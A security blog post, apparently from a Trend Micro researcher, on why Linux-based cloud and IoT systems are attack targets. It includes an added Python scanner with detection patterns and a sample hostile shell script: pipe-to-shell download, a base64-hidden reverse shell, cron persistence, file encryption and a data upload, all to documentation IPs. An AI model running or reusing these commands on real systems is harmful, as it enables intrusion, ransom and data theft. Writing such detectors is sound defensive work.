Why Linux Should Factor Into Your Security Strategy

Linux is a pervasive operating system, and for good reason. It is lightweight, flexible, runs on many hardware architectures and is open source, all of which creates loads of opportunity. Today, Linux-based systems run servers, mainframes, routers, smart cars, cloud workloads and more.

Why Linux

Linux is scalable, modular, reliable and efficient. It offers a backbone for specific implementations that is simple to tailor and adapt.

The cloud and IoT are two technologies that are built almost exclusively on Linux due to these benefits.

Linux is ideal for IoT because there’s no heavy GUI, it can be optimized for hardware-level workloads, and the licensing makes it easy for redistribution. Plus, the extensive open source community may have already created something that suits the needs of a device maker and can be plugged right in.

Many of the same benefits apply when considering Linux for cloud workloads, so it is no surprise that, as of 2017, Linux was running 90% of public cloud workloads. The benefits stated above allow cloud architects to build anything on top of it while keeping the inherent benefits of the cloud.

The cloud and IoT markets are seeing significant growth, which will further increase due to the effects of COVID-19. Remote working is likely to become the norm for many companies globally (read: digital transformation and migration to the cloud) and all the time spent at home may likely lead to people buying more smart home devices (read: growth in IoT market).

What, then, is the significance of the cloud and IoT built on Linux, and why should that matter to you or your business?

Threats Facing Linux-based Platforms

Security is one of the main reasons Linux is chosen. In some ways, it can be a more stable and secure base OS to start from, no matter the use case.

But while Linux itself may be more secure than other operating systems, it is not invulnerable. Vulnerabilities are a fact of life for any software or system, whether an actual software bug, an implementation flaw or a misconfiguration.

Further evidence that Linux is a target: cybercriminals have shown increased interest in attacking Linux over recent months and years.

So, if Linux isn’t all that secure on its own, what about the security of Linux-based platforms?

It is fairly well-known that IoT devices are fallible. Researchers have looked extensively into the security of IoT and IIoT. Across all use cases and device types, connected devices with embedded Linux-based systems provide a viable attack surface for exploitation, and we know criminals are exploring how to monetize IoT attacks.

In the broadest sense, threats to IoT devices can target:

  • The device hardware with embedded Linux-based OS.
  • The connections to a network or third-party system(s).
  • Backend capabilities, both from the IoT provider and third parties.
  • The data collected, processed and stored by the device or backend system.

Each of these four overarching areas can be vulnerable via software bugs, design flaws, implementation errors and user error.

While IoT devices are perceived to be more consumer-facing, cloud computing is used by consumers and businesses of all industries and sizes.

I’ve heard many times that there are no threats to the public cloud, or that “cloud threats” don’t exist. We’ve now seen that proven to be an incorrect assumption. Like Linux, most cloud services are built in a secure manner. But, the best-laid plans … as they say.

The Shared Responsibility Model is paramount when considering cloud security. Shared is the key word here. A shared model does not mean a transfer of risk; rather, the cloud service provider and the customer both have responsibilities for securing the environment and the data within it.

Responsibility for securing data in the cloud shifts between user and cloud service provider depending on the type of cloud environment being used, from on-premises to infrastructure as a service (IaaS), to containers, to serverless.

But in the broadest sense, threats that leverage the cloud can target:

  • The cloud service's compute resources and the Linux-based OS they run on.
  • The data being stored, collected or processed by the cloud service.
  • All methods and actors who could add or remove data from the cloud service.
  • Any integrations or connections with other applications or services.

Actual threat modeling for the cloud or IoT is much more in depth and use case-specific. However, I find it helpful to level set all the ways these devices and systems could be at risk, along with all the data processed and stored within them.

Think about the criticality of business data stored in cloud workloads and databases. According to a Forrester study in 2019, businesses are expected to spend $12.6 billion on cloud security tools by 2023 to protect this critical data.

Protect the single common thread shared across mission-critical systems and platforms: Linux.

As an industry, we spend so much time protecting an employee's laptop because an attacker could use the endpoint to traverse the network into critical systems, most of which run Linux.

However, as an attacker, if I were to use customizable malware targeting Linux, I could infect your cloud workloads, databases, possibly endpoints, mobile devices, connected cameras and so on. Or, even simpler, I would not really need malware at all, because the Linux shell already provides nearly everything malware would. A well-written shell script is as powerful as any malware, and harder to distinguish from the legitimate administration scripts it lives among.

If a sophisticated attacker wanted to thoroughly infiltrate a target organization, a potential attack could look like:

  • Use a point of entry to scan the network and find what Linux-based systems are running.
  • Customize a shell script for each implementation running on the critical systems, either by adjusting it to the commands and layout of each, or by buying malware variants for each target.
  • Run the script to infect each system to encrypt and ransom data, or exfiltrate data to sell as PII or for industrial espionage.

With this type of attack, a criminal can simultaneously target and infect all kinds of critical systems across a corporate environment. A pervasive, laterally moving attack like this would otherwise need separate tools for each target; here a single shell script, slightly modified per system, infects each at the OS level.

All of this raises the question: how is there so little focus on protecting Linux-based systems when there is so much opportunity for attackers?
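The two passages above make the point that a plain shell script can do everything malware does: stage a payload, persist, open a reverse shell, encrypt and exfiltrate data. The flip side for a defender is that such scripts can be triaged for exactly those behaviours. The following is an added example, not code from the original post or from Trend Micro: a small Python scanner that runs a set of living-off-the-land indicators over shell scripts, peels one layer of `echo … | base64 -d` obfuscation so the hidden commands are scanned too, and scores the result. The indicator patterns, the IP addresses and the two sample scripts are all constructed for illustration and are assumptions, not a vendor signature set.

```python
"""Heuristic triage of Linux shell scripts for living-off-the-land behaviour.

Added example (not from the original post). The indicator regexes are
illustrative assumptions about what a malicious shell script often contains;
a real deployment would tune them against the environment's own baseline of
legitimate administration scripts.
"""
import base64
import binascii
import re
from collections import OrderedDict

# (tactic label, compiled regex). Each pattern maps to one step of the attack
# described in the text. These are assumptions for illustration, not exhaustive.
INDICATORS = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b")),
    ("encoded-payload",      re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("reverse-shell",        re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("persistence-cron",     re.compile(r"\bcrontab\s+-|\b/etc/cron\.")),
    ("staging-in-tmp",       re.compile(r"\bchmod\s+\+x\s+/(tmp|dev/shm)/")),
    ("history-tampering",    re.compile(r"\bunset\s+HISTFILE\b|\bhistory\s+-c\b")),
    ("mass-encryption",      re.compile(r"\bopenssl\s+enc\b|\bgpg\b.*\s(-c|--symmetric)\b")),
    ("exfil-over-network",   re.compile(r"\bcurl\b.*\s(-T|--upload-file|--data-binary)\s"
                                        r"|\b(nc|ncat)\s+\S+\s+\d{2,5}\s*<")),
]

# Matches `echo <blob> | base64 -d` so the blob can be decoded and rescanned.
B64_BLOB = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{24,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)")


def peel_base64(text):
    """Return the decoded contents of every base64 blob piped to `base64 -d`.

    This strips one obfuscation layer; scan_script() feeds the result back in.
    """
    decoded = []
    for m in B64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded


def scan_script(text, depth=2):
    """Map each matched tactic to the script lines that triggered it.

    Lines from decoded base64 layers are scanned too, up to `depth` layers deep.
    """
    findings = OrderedDict()
    layers = [text]
    for _ in range(depth):
        next_layers = []
        for layer in layers:
            for line in layer.splitlines():
                for tactic, rx in INDICATORS:
                    if rx.search(line):
                        findings.setdefault(tactic, []).append(line.strip())
            next_layers.extend(peel_base64(layer))
        if not next_layers:
            break
        layers = next_layers
    return findings


def risk_score(findings):
    """Crude score: number of distinct tactics seen. Three or more merits a look."""
    return len(findings)


# Constructed benign sample: a nightly backup job.
BENIGN = (
    "#!/bin/sh\n"
    "tar czf /var/backups/www-$(date +%F).tgz /var/www\n"
    "find /var/backups -name '*.tgz' -mtime +14 -delete\n"
)

# Constructed malicious sample. The inner stage is base64-encoded exactly the way
# a script would hide it; the addresses are documentation ranges (RFC 5737).
_STAGE2 = (
    "curl -so /dev/shm/.s http://198.51.100.7/s && chmod +x /dev/shm/.s\n"
    "crontab -l | { cat; echo '*/5 * * * * /dev/shm/.s'; } | crontab -\n"
    "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1\n"
)
_BLOB = base64.b64encode(_STAGE2.encode()).decode()
SUSPICIOUS = (
    "#!/bin/bash\n"
    "unset HISTFILE\n"
    "curl -s http://198.51.100.7/x.sh | sh\n"
    "echo " + _BLOB + " | base64 -d | bash\n"
    "for f in $(find /srv -name '*.db'); do openssl enc -aes-256-cbc -salt "
    "-in \"$f\" -out \"$f.locked\" -pass pass:k; done\n"
    "curl -s -T /tmp/dump.tgz http://198.51.100.7/up\n"
)

if __name__ == "__main__":
    for name, script in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        found = scan_script(script)
        print(f"{name}: risk={risk_score(found)}")
        for tactic, lines in found.items():
            print(f"  {tactic}: {lines[0][:60]}")
```

The benign backup job produces no findings, while the malicious sample lights up all eight tactics, three of them only after the base64 layer is decoded. That last point is the practical one: a scanner that stops at the outer script would see an `echo | base64 -d | bash` line and nothing else, which is why the example recurses into decoded content.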

The cloud and IoT markets will continue to grow. And criminal interest is likely to follow.

With Linux as the common thread, how could we not see an increase in Linux-based malware in the near future?


Erin Johnson

Erin Johnson has a proven history of successfully translating the complicated world of cybersecurity into succinct, digestible messages for diverse audiences. She relishes the challenge of communicating technical topics to all levels of business leaders and media. Most recently, Erin has bridged the gap between communications and threat research by joining the Trend Micro Research team. As a researcher, she is focused on helping businesses connect the dots between the threat landscape and their IT environment to better understand their risks to effectively prioritize protection. Erin has worked in cybersecurity communications for 6 years with Trend Micro. Prior to joining Trend Micro, she worked for various public relations agencies on major tech brands, including NTT DATA, Samsung Electronics and Texas Instruments.
